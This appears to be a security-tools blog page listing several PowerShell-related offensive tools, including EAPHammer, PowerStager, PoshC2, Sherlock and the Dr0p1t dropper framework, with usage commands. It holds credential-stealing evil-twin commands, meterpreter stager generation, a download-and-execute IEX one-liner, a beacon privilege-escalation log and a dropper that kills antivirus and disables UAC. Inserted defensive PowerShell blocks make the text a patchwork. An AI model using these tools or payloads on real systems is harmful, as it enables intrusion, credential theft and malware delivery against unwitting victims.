Showing posts with label PowerShell. Show all posts

EAPHammer - Targeted Evil Twin Attacks Against WPA2-Enterprise Networks [Indirect Wireless Pivots Using Hostile Portal Attacks]


EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full-scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate how fast this tool is, here's an example of how to set up and execute a credential-stealing evil twin attack against a WPA2-TTLS network in just two commands:
# generate certificates
./eaphammer --cert-wizard

# launch attack
./eaphammer -i wlan0 --channel 4 --auth ttls --wpa 2 --essid CorpWifi --creds
Leverages a lightly modified version of hostapd-wpe, dnsmasq, dsniff, Responder, and Python 2.7.

Features
  • Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
  • Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
  • Perform captive portal attacks
  • Built-in Responder integration
  • Support for Open networks and WPA-EAP/WPA2-EAP
  • No manual configuration necessary for most attacks.
  • No manual configuration necessary for installation and setup process

Upcoming Features
  • Perform seamless MITM attacks with partial HSTS bypasses
  • Support attacks against WPA-PSK/WPA2-PSK
  • Support for SSID cloaking
  • Generate timed payloads for indirect wireless pivots
  • Integrated PowerShell payload generation
  • impacket integration for SMB relay attacks
  • directed rogue AP attacks (deauth then evil twin from PNL, deauth then karma + ACL)
  • Updated hostapd-wpe that works with the latest version of Hostapd
  • Integrated website cloner for cloning captive portal login pages
  • Integrated HTTP server
Will this tool ever support Karma attacks?
  • At some point yes, but for now the focus has been on directed evil twin attacks.
  • If Karma attacks are like a wireless grenade launcher, this tool is more like an easy-to-use wireless sniper rifle

Setup Guide

Kali Setup Instructions
Begin by cloning the eaphammer repo using the following command.
git clone https://github.com/s0lst1c3/eaphammer.git
Next run the kali-setup.py file as shown below to complete the eaphammer setup process. This will install dependencies and compile hostapd.
python setup.py

Other Distros
If you are not using Kali, you can still compile eaphammer. I just haven't written a setup script for your distro yet, which means you'll have to do it manually. Ask yourself whether you understand the following:
  • python-devel vs python-dev
  • service vs systemctl
  • network-manager vs NetworkManager
  • httpd vs apache2
If you looked at this list and immediately realized that each pair of items was to some extent equivalent (well, except for service vs systemctl, but you catch my drift), you'll probably have no problems getting this package to work on the distro of your choice. If not, please just stick with Kali until support is added for other distros.
With that out of the way, here are the generic setup instructions:
Use your package manager to install each of the dependencies listed in kali-dependencies.txt. Package names can vary slightly from distro to distro, so you may get a "package not found" error or similar. If this occurs, just use Google to find out what the equivalent package is for your distro and install that instead.
Once you have installed each of the dependencies listed in kali-dependencies.txt, you'll need to install some additional packages that ship with Kali by default. These packages are listed below. If you're on a distro that uses httpd instead of apache2, install that instead.
  • dsniff
  • apache2
Compile hostapd using the following commands:
cd hostapd-eaphammer
make
Open config.py in the text editor of your choice and edit the following lines so that they hold values that work for your distro:
# change this to False if you cannot/will not use systemd
use_systemd = True

# change this to 'NetworkManager' if necessary
network_manager = 'network-manager'

# change this 'httpd' if necessary
httpd = 'apache2'

Usage Guide

X.509 Certificate Generation
Eaphammer provides an easy-to-use wizard for generating X.509 certificates. To launch eaphammer's certificate wizard, just use the command shown below.
./eaphammer --cert-wizard

Stealing RADIUS Credentials From EAP Networks
To steal RADIUS credentials by executing an evil twin attack against an EAP network, use the --creds flag as shown below.
./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid Example --channel 2 --interface wlan0 --auth ttls --creds
The flags shown above are self-explanatory. For more granular control over the attack, you can use the --wpa flag to specify WPA vs WPA2 and the --auth flag to specify the EAP type. Note that for cred-reaping attacks, you should always specify an auth type manually, since the --auth flag defaults to "open" when omitted.
./eaphammer --bssid 00:11:22:33:44:00 --essid h4x0r --channel 4 --wpa 2 --auth ttls --interface wlan0 --creds
Please refer to the options described in Additional Options section of this document for additional details about these flags.

Stealing AD Credentials Using Hostile Portal Attacks
Eaphammer can perform hostile portal attacks that can force LLMNR/NBT-NS-enabled Windows clients into surrendering password hashes. The attack works by forcing associations using an evil twin attack, then forcing associated clients to attempt NetBIOS name resolution using a Redirect To SMB attack. While this occurs, eaphammer runs Responder in the background to perform a nearly instantaneous LLMNR/NBT-NS poisoning attack against the affected wireless clients. The result is an attack that causes affected devices not only to connect to the rogue access point, but to send NTLM hashes to the rogue access point as well.
The --hostile-portal flag can be used to execute a hostile portal attack, as shown in the examples below.
./eaphammer --interface wlan0 --bssid 1C:7E:E5:97:79:B1 --essid EvilC0rp --channel 6 --auth peap --wpa 2 --hostile-portal

./eaphammer --interface wlan0 --essid TotallyLegit --channel 1 --auth open --hostile-portal
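A defender-side counterpart to the attack described above, added here and not part of EAPHammer: a PowerShell function that reports whether a Windows host still has LLMNR and NBT-NS enabled (the preconditions the hostile portal poisons) and, with -Remediate, writes the standard hardening values. It assumes an elevated session and relies on the well-known DNSClient EnableMulticast and NetBT NetbiosOptions registry values; Get-NameResolutionExposure is an assumed name.

```powershell
# Added example, not part of EAPHammer: audit (and optionally disable) the LLMNR and
# NBT-NS name resolution that the hostile portal attack poisons. Run elevated.
function Get-NameResolutionExposure {
    [CmdletBinding()]
    param(
        # Write the hardening values instead of only reporting.
        [switch]$Remediate
    )

    $results = @()

    # LLMNR is controlled by the DNSClient policy value EnableMulticast:
    # 0 disables it; a missing value means LLMNR is still on.
    $llmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    $llmnr = (Get-ItemProperty -Path $llmnrKey -Name EnableMulticast -ErrorAction SilentlyContinue).EnableMulticast
    $llmnrEnabled = ($null -eq $llmnr) -or ($llmnr -ne 0)
    if ($Remediate -and $llmnrEnabled) {
        New-Item -Path $llmnrKey -Force | Out-Null
        Set-ItemProperty -Path $llmnrKey -Name EnableMulticast -Value 0 -Type DWord
        $llmnrEnabled = $false
    }
    $results += [pscustomobject]@{ Protocol = 'LLMNR'; Interface = '(all)'; Enabled = $llmnrEnabled }

    # NBT-NS is set per interface via NetbiosOptions under NetBT\Parameters\Interfaces:
    # 0 = follow the DHCP setting, 1 = enabled, 2 = disabled.
    $ifRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
    foreach ($iface in (Get-ChildItem -Path $ifRoot)) {
        $opt = (Get-ItemProperty -Path $iface.PSPath -Name NetbiosOptions -ErrorAction SilentlyContinue).NetbiosOptions
        $nbtEnabled = ($opt -ne 2)
        if ($Remediate -and $nbtEnabled) {
            Set-ItemProperty -Path $iface.PSPath -Name NetbiosOptions -Value 2 -Type DWord
            $nbtEnabled = $false
        }
        $results += [pscustomobject]@{ Protocol = 'NBT-NS'; Interface = $iface.PSChildName; Enabled = $nbtEnabled }
    }

    return $results
}

# Report only; add -Remediate to apply the changes.
Get-NameResolutionExposure | Format-Table -AutoSize
```

Any interface that still shows Enabled = True for NBT-NS, or a True LLMNR row, is a client that would answer the poisoned name queries described above.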

Performing Indirect Wireless Pivots Using Hostile Portal Attacks
The hostile portal attack described in Stealing AD Credentials Using Hostile Portal Attacks can be used to perform an SMB relay attack against the affected devices. An attacker can use a hostile portal attack to perform an SMB relay attack that places a timed reverse shell on an authorized wireless device. The attacker can then disengage the attack to allow the authorized device to reconnect to the targeted network. When the attacker receives the reverse shell, he or she will have the same level of authorization as the authorized device.

Performing Captive Portal Attacks
To perform a captive portal attack using eaphammer, use the --captive-portal flag as shown below.
./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid HappyMealz --channel 6 --interface wlan0 --captive-portal
This will cause eaphammer to execute an evil twin attack in which the HTTP(S) traffic of all affected wireless clients is redirected to a website you control. Eaphammer will leverage Apache2 to serve web content out of /var/www/html if used with the default Apache2 configuration. Future iterations of eaphammer will provide an integrated HTTP server and website cloner for attacks against captive portal login pages.

Additional Options
  • --cert-wizard - Use this flag to create a new RADIUS cert for your AP.
  • -h, --help - Display detailed help message and exit.
  • -i, --interface - Specify the PHY interface on which to create your AP.
  • -e ESSID, --essid ESSID - Specify access point ESSID.
  • -b BSSID, --bssid BSSID - Specify access point BSSID.
  • --hw-mode HW-MODE - Specify access point hardware mode (default: g).
  • -c CHANNEL, --channel CHANNEL - Specify access point channel.
  • --wpa {1,2} - Specify WPA type (default: 2).
  • --auth {peap,ttls,open} - Specify auth type (default: open).
  • --creds - Harvest EAP creds using an evil twin attack.
  • --hostile-portal - Force clients to connect to hostile portal.
  • --captive-portal - Force clients to connect to a captive portal.


PowerStager - A payload stager using PowerShell


This script creates an executable stager that downloads a selected PowerShell payload, loads it into memory and executes it using obfuscated EC methods. The script will also encrypt the stager for dynamic signatures and some additional obfuscation.

This enables the actual payload to be executed indirectly without the victim downloading it, only by executing the stager. The attacker can then, for example, implement evasion techniques on the web server hosting the payload instead of in the stager itself.

Additional methods allow the payload to be embedded into the stager and temporarily stored encrypted on disk for memory injection.

Not only is PowerShell powerful when managing Windows, it is also powerful when exploiting Windows. This script exploits multiple Windows features such as its inherent trust of PowerShell, interpretation of shorthand syntaxes, code evaluation and more...

How to use
Install it:
git clone https://github.com/z0noxz/powerstager
cd powerstager
sudo ./setup.py install
Generate a meterpreter payload to upload:
powerstager -t win64 -o out.ps1 -m --lhost 13.37.13.37 --lport 4444 --generate
powerstager -t win64 -o out.exe -u <url pointing to the uploaded payload>
Generate an embedded meterpreter payload:
powerstager -t win64 -o out.exe -m --lhost 13.37.13.37 --lport 4444
Generate an embedded custom payload:
powerstager -t win64 -o out.exe -p input.ps1


PowerMeta - PowerShell Script to Search Publicly Files for a Particular Domain and Get the Associated MetaData


PowerMeta searches for publicly available files hosted on various websites for a particular domain by using specially crafted Google and Bing searches. It then allows for the download of those files from the target domain. After retrieving the files, the metadata associated with them can be analyzed by PowerMeta. Some interesting things commonly found in metadata are usernames, domains, software titles, and computer names.

Public File Discovery
For many organizations it's common to find publicly available files posted on their external websites. Many times these files contain sensitive information that might be of benefit to an attacker like usernames, domains, software titles or computer names. PowerMeta searches both Bing and Google for files on a particular domain using search strings like "site:targetdomain.com filetype:pdf". By default it searches for "pdf, docx, xlsx, doc, xls, pptx, and ppt".

Metadata Extraction
PowerMeta uses Exiftool by Phil Harvey to extract metadata information from files. If you would prefer to download the binary from his site directly instead of using the one in this repo, it can be found here: http://www.sno.phy.queensu.ca/~phil/exiftool/. Just make sure the exiftool executable is in the same directory as PowerMeta.ps1 when it is run. By default it just extracts the 'Author' and 'Creator' fields, as these commonly have usernames saved. However, all metadata for files can be extracted by passing PowerMeta the -ExtractAllToCsv flag.

Usage

Basic Search
This command will initiate Google and Bing searches for files on the 'targetdomain.com' domain ending with a file extension of pdf, docx, xlsx, doc, xls, pptx, or ppt. Once it has finished crafting this list it will prompt the user asking if they wish to download the files from the target domain. After downloading files it will prompt again for extraction of metadata from those files.
C:\PS> Invoke-PowerMeta -TargetDomain targetdomain.com

Changing FileTypes and Automatic Download and Extract
This command will initiate Google and Bing searches for files on the 'targetdomain.com' domain ending with a file extension of pdf, or xml. It will then automatically download them from the target domain and extract metadata.
C:\PS> Invoke-PowerMeta -TargetDomain targetdomain.com -FileTypes "pdf, xml" -Download -Extract

Downloading Files From A List
This command will initiate Google and Bing searches for files on the 'targetdomain.com' domain ending with a file extension of pdf, docx, xlsx, doc, xls, pptx, or ppt and write the links of files found to disk in a file called "target-domain-links.txt".
C:\PS> Invoke-PowerMeta -TargetDomain targetdomain.com -TargetFileList target-domain-links.txt

Extract All Metadata and Limit Page Search
This command will initiate Google and Bing searches for files on the 'targetdomain.com' domain ending with a file extension of pdf, docx, xlsx, doc, xls, pptx, or ppt, but only search the first two pages. All metadata (not just the default fields) will be saved in a CSV called all-target-metadata.csv.
C:\PS> Invoke-PowerMeta -TargetDomain targetdomain.com -MaxSearchPages 2 -ExtractAllToCsv all-target-metadata.csv

Extract Metadata From Files In A Directory
This command will simply extract all the metadata from all the files in the folder "\2017-03-031-144953" and save it in a CSV called all-target-metadata.csv
C:\PS> ExtractMetadata -OutputDir .\2017-03-031-144953\ -ExtractAllToCsv all-target-metadata.csv

PowerMeta Options
TargetDomain - The target domain to search for files.
FileTypes - A comma-separated list of file extensions to search for. By default PowerMeta searches for "pdf, docx, xlsx, doc, xls, pptx, ppt".
OutputList - A file to which the list of links discovered through web searching is written.
OutputDir - A directory to store all downloaded files in.
TargetFileList - List of file links to download.
Download - Instead of being prompted interactively, pass this flag to auto-download the files found.
Extract - Instead of being prompted interactively, pass this flag to auto-extract metadata from the files found.
ExtractAllToCsv - All metadata (not just the default fields) will be extracted from files to the CSV specified with this flag.
UserAgent - Change the default User-Agent used by PowerMeta.
MaxSearchPages - The maximum number of pages to search on each search engine.


Mousejack Transmit - Wireless Mouse/Keyboard Attack With Replay/Transmit PoC


This is code extending the mousejack tools https://github.com/RFStorm/mousejack.
Replay/transmit tools have been added to the original tools.
POC packets based on a Logitech Wireless Combo MK220 which consists of a K220 wireless keyboard and an M150 wireless mouse are included in the logs folder.
More details available here https://www.ckn.io/blog/2016/07/09/hijacking-wireless-mice-and-keyboards/

scanner
Pseudo-promiscuous mode device discovery tool, which sweeps a list of channels and prints out decoded Enhanced Shockburst packets.
usage: ./nrf24-scanner.py [-h] [-c N [N ...]] [-v] [-l] [-p PREFIX] [-d DWELL]

optional arguments:
-h, --help show this help message and exit
-c N [N ...], --channels N [N ...] RF channels
-v, --verbose Enable verbose output
-l, --lna Enable the LNA (for CrazyRadio PA dongles)
-p PREFIX, --prefix PREFIX Promiscuous mode address prefix
-d DWELL, --dwell DWELL Dwell time per channel, in milliseconds
Scan for devices on channels 1-5
./nrf24-scanner.py -c {1..5}
Scan for devices with an address starting in 0xA9 on all channels
./nrf24-scanner.py -p A9

sniffer
Device-following sniffer, which follows a specific nRF24 device as it hops and prints out decoded Enhanced Shockburst packets from the device. This version has also been modified to log the packets to a log file.
usage: ./nrf24-sniffer.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS -o OUTPUT [-t TIMEOUT] [-k ACK_TIMEOUT] [-r RETRIES] 

optional arguments:
-h, --help show this help message and exit
-c N [N ...], --channels N [N ...] RF channels
-v, --verbose Enable verbose output
-l, --lna Enable the LNA (for CrazyRadio PA dongles)
-a ADDRESS, --address ADDRESS Address to sniff, following as it changes channels
-o OUTPUT, --output OUTPUT Output file to log the packets
-t TIMEOUT, --timeout TIMEOUT Channel timeout, in milliseconds
-k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT ACK timeout in microseconds, accepts [250,4000], step 250
-r RETRIES, --retries RETRIES Auto retry limit, accepts [0,15]
Sniff packets from address 8C:D3:0F:3E:B4 on all channels and save them to output.log
./nrf24-sniffer.py -a 8C:D3:0F:3E:B4 -o logs/output.log

replay/transmit
Replay captured packets or transmit generated ones. It follows a specific nRF24 device as it hops, and sends packets from a log file.
usage: ./nrf24-replay.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS -i INPUT_FILE [-t TIMEOUT] [-k ACK_TIMEOUT] [-r RETRIES] 

optional arguments:
-h, --help show this help message and exit
-c N [N ...], --channels N [N ...] RF channels
-v, --verbose Enable verbose output
-l, --lna Enable the LNA (for CrazyRadio PA dongles)
-a ADDRESS, --address ADDRESS Address to sniff, following as it changes channels
-i INPUT_FILE, --input INPUT_FILE Input file that has the packets to send
-t TIMEOUT, --timeout TIMEOUT Channel timeout, in milliseconds
-k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT ACK timeout in microseconds, accepts [250,4000], step 250
-r RETRIES, --retries RETRIES Auto retry limit, accepts [0,15]
Send packets from file keystroke.log to address 8C:D3:0F:3E:B4 on hopping channel
./nrf24-replay.py -a 8C:D3:0F:3E:B4 -i logs/keystroke.log

network mapper
Star network mapper, which attempts to discover the active addresses in a star network by changing the last byte in the given address, and pinging each of 256 possible addresses on each channel in the channel list.
usage: ./nrf24-network-mapper.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS [-p PASSES] [-k ACK_TIMEOUT] [-r RETRIES]

optional arguments:
-h, --help show this help message and exit
-c N [N ...], --channels N [N ...] RF channels
-v, --verbose Enable verbose output
-l, --lna Enable the LNA (for CrazyRadio PA dongles)
-a ADDRESS, --address ADDRESS Known address
-p PASSES, --passes PASSES Number of passes (default 2)
-k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT ACK timeout in microseconds, accepts [250,4000], step 250
-r RETRIES, --retries RETRIES Auto retry limit, accepts [0,15]
Map the star network that address 61:49:66:82:03 belongs to
./nrf24-network-mapper.py -a 61:49:66:82:03

continuous tone test
The nRF24LU1+ chips include a test mechanism to transmit a continuous tone, the frequency of which can be verified if you have access to an SDR. There is the potential for frequency offsets between devices to cause unexpected behavior. For instance, one of the SparkFun breakout boards that was tested had a frequency offset of ~300kHz, which caused it to receive packets on two adjacent channels.
This script will cause the transceiver to transmit a tone on the first channel that is passed in.
usage: ./nrf24-continuous-tone-test.py [-h] [-c N [N ...]] [-v] [-l]

optional arguments:
-h, --help show this help message and exit
-c N [N ...], --channels N [N ...] RF channels
-v, --verbose Enable verbose output
-l, --lna Enable the LNA (for CrazyRadio PA dongles)
Transmit a continuous tone at 2405MHz
./nrf24-continuous-tone-test.py -c 5

Packet generator script
This uses a dictionary to map keyboard presses to the equivalent packets. It reads stdin input and logs the mapped packets to logs/keystrokes.log. It will accept input until Ctrl+C is pressed.
usage: ./keymapper.py 

Log files
The folder logs contains various pre-saved packets for various keyboard operations.
Shell.log is for exploitation of a Windows machine by running a powershell one-liner which connects back to the attacker machine.
The file keys.log serves as a reference where various key presses and combinations are mapped to their equivalent packets.

Demo
A demo of exploiting a Windows machine:


PoshC2 - Powershell C2 Server and Implants


PoshC2 is a proxy aware C2 framework written completely in PowerShell to aid penetration testers with red teaming, post-exploitation and lateral movement. The tools and modules were developed off the back of our successful PowerShell sessions and payload types for the Metasploit Framework. PowerShell was chosen as the base language as it provides all of the functionality and rich features required without needing to introduce multiple languages to the framework.

Requires only Powershell v2 on both server and client

C2 Server

Implant Handler


Quick Install
powershell -exec bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/nettitude/PoshC2/master/C2-Installer.ps1')"

Team Server
Create one PoshC2 team server and allow multiple red teamers to connect using the C2 Viewer and Implant Handler


Sherlock - Tool to find missing Windows patches for Local Privilege Escalation Vulnerabilities


PowerShell script to quickly find missing Microsoft patches for local privilege escalation vulnerabilities.

Currently looks for:
  • MS10-015 : User Mode to Ring (KiTrap0D)
  • MS10-092 : Task Scheduler
  • MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
  • MS13-081 : TrackPopupMenuEx Win32k NULL Page
  • MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
  • MS15-051 : ClientCopyImage Win32k
  • MS15-078 : Font Driver Buffer Overflow
  • MS16-016 : 'mrxdav.sys' WebDAV
  • MS16-032 : Secondary Logon Handle

Tested on:
  • Windows 7 SP1 32-bit
  • Windows 7 SP1 64-bit
  • Windows 8 64-bit
  • Windows 10 64-bit

Basic Usage:
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are Win7-x64\Rasta

beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
[+] host called home, sent: 2960 bytes

beacon> powershell Find-AllVulns
[*] Tasked beacon to run: Find-AllVulns
[+] host called home, sent: 21 bytes
[+] received output:


Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

beacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...

[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105

[+] established link to parent beacon: 192.168.56.105
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)
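An added example, not part of Sherlock: a small PowerShell parser for the "Key : Value" record format that Find-AllVulns prints above, so the entries marked Appears Vulnerable can be filtered and exported for a patch-gap report. The sample text is copied from the output above; ConvertFrom-SherlockOutput and Get-SherlockFindings are assumed names.

```powershell
# Added example, not part of Sherlock: parse the "Key : Value" records that
# Find-AllVulns prints into objects for filtering and reporting.
function ConvertFrom-SherlockOutput {
    param([Parameter(Mandatory)][string]$Text)

    # Records are separated by one or more blank lines.
    foreach ($block in ($Text -split '(?:\r?\n){2,}')) {
        $fields = @{}
        foreach ($line in ($block -split '\r?\n')) {
            # Match the first colon only, so URLs in the Link field stay intact.
            if ($line -match '^\s*(\w+)\s*:\s*(.*)$') {
                $fields[$Matches[1]] = $Matches[2].Trim()
            }
        }
        # Skip anything that is not a finding (beacon chatter, empty chunks).
        if (-not $fields.ContainsKey('MSBulletin')) { continue }

        [pscustomobject]@{
            Bulletin = $fields['MSBulletin']
            Title    = $fields['Title']
            # CVEID is a comma-separated list of bare numbers; normalise to CVE-YYYY-NNNN.
            CVEs     = @($fields['CVEID'] -split ',\s*' | ForEach-Object { "CVE-$_" })
            Link     = $fields['Link']
            Status   = $fields['VulnStatus']
        }
    }
}

# Return only the findings that need patching, most recent bulletin first.
function Get-SherlockFindings {
    param([Parameter(Mandatory)][string]$Text)
    ConvertFrom-SherlockOutput -Text $Text |
        Where-Object { $_.Status -eq 'Appears Vulnerable' } |
        Sort-Object Bulletin -Descending
}

# Constructed sample: two records taken from the output shown above.
$sample = @'
Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
'@

Get-SherlockFindings -Text $sample |
    Select-Object Bulletin, Title, @{ n = 'CVEs'; e = { $_.CVEs -join ', ' } } |
    Format-Table -AutoSize
```

On the sample above only MS14-058 (CVE-2014-4113) is returned; pipe the same objects to Export-Csv to hand the list to whoever owns patching.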


Dr0p1t-Framework 1.2 - A Framework That Creates An Advanced FUD Dropper With Some Tricks

Have you ever heard about trojan droppers?

In short, a dropper is a type of trojan that downloads other malware, and Dr0p1t gives you the chance to create a dropper that bypasses most AVs and has some tricks ;)

Features
  • Framework works with Windows and Linux
  • Downloads an executable on the target system and executes it silently
  • The executable is small compared to other droppers generated the same way
  • Self-destruct function so that the dropper will kill and delete itself after finishing its work
  • Adds the executable to startup after downloading it
  • Adds the executable to the task scheduler after downloading it (UAC does not matter)
  • Finds and kills the antivirus before running the malware
  • Runs a custom (batch|powershell|vbs) file you have chosen before running the executable
  • The ability to disable UAC
  • When running PowerShell scripts it can bypass the execution policy
  • Uses UPX to compress the dropper after creating it
  • Lets you choose an icon for the dropper after creating it

Screenshots

On Windows

On Linux (Backbox)

Help menu
Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
--upx Use UPX to compress the final file.
--nouac Disable UAC on victim device
--nocompile Tell the framework to not compile the final file.
-i Use icon to the final file. Check icons folder.
-q Stay quiet ( no banner )
-u Check for updates
-nd Display less output information

Examples
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites
  • Python 2 or Python 3.
The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller
  • Python libraries requirements in requirements.txt

Needed dependencies for linux
  • Wine
  • Python 2.7 on Wine Machine
Note : You must have root access

Installation
If you are on Linux, do:
git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py
If you are on Windows, download it and then do:
cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py
The libraries in windows_requirements.txt are used to enable Unicode on Windows, which makes coloring possible.

Tested on:
  • Kali Linux - SANA
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Changelog v1.2
  • Pyinstaller compiling in Linux using wine
  • Pyinstaller compiling in Windows will not use UPX and that will fix the compiling in windows
  • Added the ability to disable and bypass UAC
  • Updated the antivirus list in the antivirus killer
  • Added SelfDestruct function so that the dropper will kill and delete itself after finishing its work :smile:
  • Full framework rewrite and recheck to fix errors, typos and replacing some libraries to make the size of the final file smaller
  • Started working in some SE tricks to fool the user and there's a lot of good options in the way ;) Stay Tuned

ansvif - An Advanced Fuzzing Framework Designed To Find Vulnerabilities In C/C++ Code.


ansvif, written primarily in C++, is designed to find code bugs by throwing garbage input at programs to see how they react. This is great for finding bugs, because not every type of input is always handled, buffers are not always checked, etc. It also comes in handy when writing (and protecting against) buffer overflow exploitation, as well as string input validation vulnerabilities (the %s bug).

Dependencies:
automake autoconf-archive zlib1g-dev libcrypto++ g++ gcc

Compilation:
Linux:
$ aclocal && autoconf && automake -a && ./configure && make

Or, if you would like to play with the syscall fuzzer:

$ aclocal && autoconf && automake -a && ./configure --enable-syscalls && make

OpenBSD:
$ AUTOMAKE_VERSION=`ls /usr/local/bin/automake-* | head -n 1 | sed -e 's/.*-//'`\
AUTOCONF_VERSION=`ls /usr/local/bin/autoconf-* | head -n 1 | sed -e 's/.*-//'`\
aclocal && AUTOMAKE_VERSION=`ls /usr/local/bin/automake-* | head -n 1 | sed -e 's/.*-//'`\
AUTOCONF_VERSION=`ls /usr/local/bin/autoconf-* | head -n 1 | sed -e 's/.*-//'`\
autoconf && AUTOMAKE_VERSION=`ls /usr/local/bin/automake-* | head -n 1 | sed -e 's/.*-//'`\
AUTOCONF_VERSION=`ls /usr/local/bin/autoconf-* | head -n 1 | sed -e 's/.*-//'` automake -a\
&& CXX=eg++ ./configure && make
Windows:
Windows binaries are now designed to be compiled with MinGW-W64 (since we use threading, download a version of MinGW-W64 g++ with SEH).
(Go to where you installed MinGW-W64 and click mingw-64.bat)
g++.exe src/common.cpp src/win/bin2hex.cpp src/win/bin2hex_pc.cpp src/win/popen2.cpp src/win/main.cpp src/win/help.cpp src/match_seg.cpp src/win/sys_string.cpp src/win/sys_string_pc.cpp src/win/man_read.cpp src/randomizer.cpp src/trash.cpp -I./ -I./include -std=c++11 -lstdc++ -lpthread -O2 -o ansvif.exe -static -static-libgcc -static-libstdc++
gcc src/win/printf.c -o printf.exe
Note: cygwin .dll external files are no longer required, as we now compile with g++ from MinGW. In Windows 7, PowerShell v2 is installed by default; however, this program requires at least PowerShell v5. Windows 10 includes PowerShell v5. You can go to Microsoft's site and download the Windows Management Framework (which includes newer versions of PowerShell) here:
https://www.microsoft.com/en-us/download/details.aspx?id=50395

Testing:
If you would like to try out the example code, you can compile faulty.c with:
$ gcc faulty.c -o faulty
Using the example code: you can point the memory back at address \xff\x05\x40\x00\x00\x00\x00\x00 (the subroutine containing the code that spawns bash) with:
$ ./faulty -a $(perl -e 'print "A"x24;print "\x00\xff\x05\x40\x00\x00\x00\x00\x00"')
